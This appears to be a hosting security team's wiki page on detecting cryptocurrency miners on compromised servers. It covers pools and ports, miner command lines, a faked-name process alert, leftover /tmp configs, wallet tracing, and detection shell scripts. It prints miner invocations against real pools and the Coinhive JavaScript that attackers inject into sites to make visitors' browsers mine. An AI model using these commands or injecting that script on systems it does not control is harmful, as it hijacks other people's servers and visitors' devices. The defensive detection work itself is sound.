Hestat edited this page Dec 14, 2017 · 1 revision

Malicious Crypto mining

Crypto mining on servers is rising in popularity: as of 12/13/17 Bitcoin has a value above 16,000 per coin. While still far behind phishing and spamming, crypto mining on servers is becoming an increasingly common way to monetize compromised servers. In the research performed for this wiki, over 17 cases of mining on our network mined $634,000 USD in Monero coins.

Besides the rising value of coins, newer currencies, at this time specifically Monero (XMR), have made this a viable strategy for extracting value from a compromised server.


Crypto mining at this time is generally performed by a pool of computers, where various 'miners' (in our case, compromised servers) contribute compute resources and are paid out in proportion to the share of the pool's compute power they contribute.

The following pools have been observed in malicious mining: xmr.crypto-pool.fr, xmr-eu1.nanopool.org, yescrypt.mine.zpool.ca, pool.minexmr.com, monerohash.com

These are the ports they generally communicate on: 3333, 4444, 5555, 6666, 7777, 8888, 9999, 14444, 14433

Programs Used

These are the programs most commonly used to mine on these pools: CPUMiner (forked by LucasJones & Wolf)

Example: minerd -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u YOUR_WALLET_ADDRESS -p x

YAM Miner (by yvg1900)

Example: yam -c x -M stratum+tcp://YOUR_WALLET_ADDRESS:x@xmr.crypto-pool.fr:3333/xmr

Claymore CPU Miner

Example: NsCpuCNMiner64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u YOUR_WALLET_ADDRESS -p x

Claymore GPU Miner

Example: NsGpuCNMiner -o stratum+tcp://xmr.crypto-pool.fr:3333 -u YOUR_WALLET_ADDRESS -p x

ccminer (forked by tsiv)

Example: ccminer -o stratum+tcp://xmr.crypto-pool.fr:3333 -u YOUR_WALLET_ADDRESS -p x

Detection Methods

Minerchk script

There is an alpha version script available for detecting miners:

mkdir -p /root/bin

wget -O /root/bin/minerchk https://raw.githubusercontent.com/Hestat/minerchk/master/minerchk.sh

chmod +x /root/bin/minerchk

Most often you will come across these compromises during a load investigation, during another hacked-site investigation, or if you see an LFD alert like the following.

Example LFD Alert

Command Line (the process name is often faked by the exploit, as with "-bash" here):

-bash -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 46uk51aJnMT4VyvwEGhHA9QKSsFiDt8iN48nJza7xnG9epk7y9Xz6KCDfai1bLALuFa7rHNoMPep1RZw8J8GLr4q1fnLNZ4 -p x
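A quick triage check for the process and connection signatures listed above (the pool hostnames, the pool ports, the stratum+tcp:// URL and the cryptonight flag), written as an added example for this wiki rather than code from the minerchk project. The ps and ss samples are constructed; the miner line reuses the faked "-bash" command line from the alert above, and the pool and port lists are the ones on this page.

```shell
#!/bin/sh
# Constructed `ps -eo pid,user,args` output: two benign processes and the
# faked "-bash" miner from the LFD alert above (wallet is the one quoted there).
SAMPLE_PS=' 412 root   /usr/sbin/sshd -D
 980 nobody /usr/sbin/httpd -k start
1563 nobody -bash -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 46uk51aJnMT4VyvwEGhHA9QKSsFiDt8iN48nJza7xnG9epk7y9Xz6KCDfai1bLALuFa7rHNoMPep1RZw8J8GLr4q1fnLNZ4 -p x'
# Constructed `ss -tn` output: one connection to a known pool port, one to HTTPS.
SAMPLE_SS='ESTAB 0 0 10.0.0.5:41234 203.0.113.7:3333
ESTAB 0 0 10.0.0.5:41235 198.51.100.9:443'

# Pools and ports listed on this page; extend both as new ones are observed.
POOLS='xmr\.crypto-pool\.fr|xmr-eu1\.nanopool\.org|yescrypt\.mine\.zpool\.ca|pool\.minexmr\.com|monerohash\.com'
PORTS='3333|4444|5555|6666|7777|8888|9999|14444|14433'

# Print the lines of the given text that show a known pool, an endpoint on a
# known pool port, a stratum URL, or a CryptoNight algorithm flag.
# The port check requires the port to be the whole number after a ':' so that
# e.g. :41234 or :443 does not match 4444.
flag_miner_lines() {
    printf '%s\n' "$1" | grep -E -i \
        "stratum\+tcp://|($POOLS)|:($PORTS)([^0-9]|$)|-a +cryptonight" || true
}

# Demo on the constructed samples. On a host under investigation run:
#   flag_miner_lines "$(ps -eo pid,user,args)"
#   flag_miner_lines "$(ss -tn)"
flag_miner_lines "$SAMPLE_PS"
flag_miner_lines "$SAMPLE_SS"
```

A match is a lead, not a verdict: a legitimate process may talk to port 4444, so confirm with the binary and config checks further down before acting.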

These miners are most frequently loaded from a shared, world-writable area such as /tmp or /dev/shm. They will often leave a file behind in one of these directories that ends with the .c extension:

root@host [1563 18:27:40 ~]# cat /tmp/phpXBaIHk.c
threads = 1
mine = stratum+tcp://4AQVBkuyXEaWRzmF8tBynWdMA1kAA6rzricUH7Jj5UNaYT3UXH4aT8c2TTKLw3VyZZLgt15WD7xAA1NamQ7rgzXA3pxNpxN:x@xmr.crypto-pool.fr:3333/xmr

This will be accompanied by a file with the same name minus the .c extension: the compiled binary that does the mining.
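The .c config file plus its same-named binary is a pairing that can be checked for directly. The following is an added example (not part of minerchk or this wiki's original content): it builds a constructed sandbox directory mimicking the /tmp/phpXBaIHk.c case above, with a placeholder wallet and an empty file standing in for the binary, and then scans it.

```shell
#!/bin/sh
# Build a constructed sandbox directory that mimics the case described above:
# a config phpXBaIHk.c, a same-named stand-in for the compiled miner binary,
# and an unrelated .c file that has no sibling binary.
make_sample_tree() {
    d=$(mktemp -d)
    printf 'threads = 1\nmine = stratum+tcp://WALLET_PLACEHOLDER:x@xmr.crypto-pool.fr:3333/xmr\n' > "$d/phpXBaIHk.c"
    : > "$d/phpXBaIHk"                                     # stand-in for the binary (empty file)
    printf 'int main(void) { return 0; }\n' > "$d/legit.c"  # harmless: no stratum line
    printf '%s\n' "$d"
}

# Scan the given directories for .c files carrying a stratum pool line and
# report whether the same-named binary sits beside each one.
# Output: "<config path> binary=<yes|no>" per finding.
find_miner_configs() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        for cfg in "$dir"/*.c; do
            [ -f "$cfg" ] || continue
            if grep -q 'stratum+tcp://' "$cfg"; then
                bin=${cfg%.c}
                if [ -f "$bin" ]; then present=yes; else present=no; fi
                printf '%s binary=%s\n' "$cfg" "$present"
            fi
        done
    done
}

# Demo on the constructed tree; on a real host run: find_miner_configs /tmp /dev/shm
sample=$(make_sample_tree)
find_miner_configs "$sample"
rm -rf "$sample"
```

When the binary is reported missing, the process may still be running from a deleted file; `ls -l /proc/<pid>/exe` on a flagged PID will show it as "(deleted)".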

Clientside Mining

Another new method of mining is to inject malicious JavaScript into site files, causing any clients that visit the site to mine crypto in the browser.

The Coinhive pool was one of the first to create a mining pool geared exclusively towards this kind of mining. The following script is how they currently implement this miner on a site:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.User('<site-key>', 'john-doe');
miner.start();
</script>
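Because the injection is static text in site files, a docroot scan for the loader URL and the miner constructor finds it. This is an added example, not code from this wiki or from Coinhive: it writes a constructed docroot (one page carrying the snippet above with a placeholder site key, one clean page) and scans it. The CoinHive.Anonymous constructor is assumed from Coinhive's published API and is not shown on this page.

```shell
#!/bin/sh
# Constructed docroot (not a real site): one page with the Coinhive loader and
# miner start call injected, as quoted above, and one clean page.
make_sample_site() {
    d=$(mktemp -d)
    cat > "$d/index.html" <<'EOF'
<html><body><h1>Welcome</h1>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.User('SITE-KEY-PLACEHOLDER', 'john-doe');
miner.start();
</script>
</body></html>
EOF
    printf '<html><body><p>nothing to see</p></body></html>\n' > "$d/about.html"
    printf '%s\n' "$d"
}

# Report every line in the docroot's html/php/js files that loads the Coinhive
# library or constructs its miner object. Output: "path:line:match".
scan_for_browser_miners() {
    find "$1" -type f \( -name '*.html' -o -name '*.php' -o -name '*.js' \) \
        -exec grep -H -n -o -E \
        'coinhive\.com/lib/coinhive\.min\.js|CoinHive\.(User|Anonymous)\(' {} + || true
}

# Demo on the constructed docroot; on a real host point it at the site's docroot.
site=$(make_sample_site)
scan_for_browser_miners "$site"
rm -rf "$site"
```

Injected loaders are sometimes obfuscated or served from a lookalike domain, so treat an empty result as "nothing matched these two strings", and compare the file against a known-good copy when the site's behaviour still looks wrong.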

Tracking wallets

In most cases the mining software used will reveal the wallet used to collect the XMR payout. From the example used previously:

mine = stratum+tcp://4AQVBkuyXEaWRzmF8tBynWdMA1kAA6rzricUH7Jj5UNaYT3UXH4aT8c2TTKLw3VyZZLgt15WD7xAA1NamQ7rgzXA3pxNpxN:x@xmr.crypto-pool.fr:3333/xmr

The public key (wallet address) is: 4AQVBkuyXEaWRzmF8tBynWdMA1kAA6rzricUH7Jj5UNaYT3UXH4aT8c2TTKLw3VyZZLgt15WD7xAA1NamQ7rgzXA3pxNpxN

After some additional searching we can see this pool is tied to: https://monero.crypto-pool.fr

Here we can see that this miner has earned 1.50 XMR, or around $450 at the current exchange rate of 299 USD/XMR.
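Pulling the pool and wallet out of whatever form the miner was found in (the "-o URL -u WALLET" style of minerd, ccminer and the Claymore miners, or the "WALLET:x@host:port" URL style of yam and the .c config files) can be done with one small parser. This is an added example, not code from this wiki; the sample lines are constructed from the invocation forms shown above and reuse the two wallet addresses already quoted on this page.

```shell
#!/bin/sh
# Constructed samples of the invocation forms on this page. W1 and W2 are the
# two wallet addresses already quoted above, not newly harvested ones.
W1=46uk51aJnMT4VyvwEGhHA9QKSsFiDt8iN48nJza7xnG9epk7y9Xz6KCDfai1bLALuFa7rHNoMPep1RZw8J8GLr4q1fnLNZ4
W2=4AQVBkuyXEaWRzmF8tBynWdMA1kAA6rzricUH7Jj5UNaYT3UXH4aT8c2TTKLw3VyZZLgt15WD7xAA1NamQ7rgzXA3pxNpxN
SAMPLE_MINERD="minerd -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u $W1 -p x"
SAMPLE_YAM="yam -c x -M stratum+tcp://$W2:x@xmr.crypto-pool.fr:3333/xmr"
SAMPLE_CONF="mine = stratum+tcp://$W2:x@xmr.crypto-pool.fr:3333/xmr"

# Given one miner command line or config line, print "host port wallet".
# Handles the "-o URL -u WALLET" form (minerd, ccminer, Claymore) and the
# "WALLET:pass@host:port/path" URL form (yam, the .c config files).
# Returns 1 when the line carries no stratum URL at all.
miner_endpoint() {
    line=$1
    url=$(printf '%s\n' "$line" | grep -oE 'stratum\+tcp://[^ ]+' | head -n 1)
    [ -n "$url" ] || return 1
    rest=${url#stratum+tcp://}          # WALLET:x@host:port/xmr  or  host:port
    case "$rest" in
        *@*)
            wallet=${rest%%:*}          # text before the first ':'
            hostport=${rest#*@}         # text after the '@'
            ;;
        *)
            hostport=$rest
            wallet=$(printf '%s\n' "$line" | sed -nE 's/.*-u +([A-Za-z0-9]+).*/\1/p')
            ;;
    esac
    hostport=${hostport%%/*}            # drop a trailing /xmr style path
    printf '%s %s %s\n' "${hostport%%:*}" "${hostport##*:}" "$wallet"
}

# Demo on the constructed samples; on a real host feed it flagged ps lines or
# the contents of a recovered .c config.
for s in "$SAMPLE_MINERD" "$SAMPLE_YAM" "$SAMPLE_CONF"; do
    miner_endpoint "$s"
done
```

The host and wallet together are what a takedown request to the pool needs, and the wallet is the value to search the pool's public stats page for, as done with crypto-pool.fr above.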

These pools will also lock accounts that have been identified as mining maliciously; one wallet found during the current research returned the following response:

"You addresse mining is suspend for botnet usage.Send me email to mine@crypto-pool.fr"

So locating these wallets and submitting takedown requests to the pools would help lower the incidence of mining on our network.
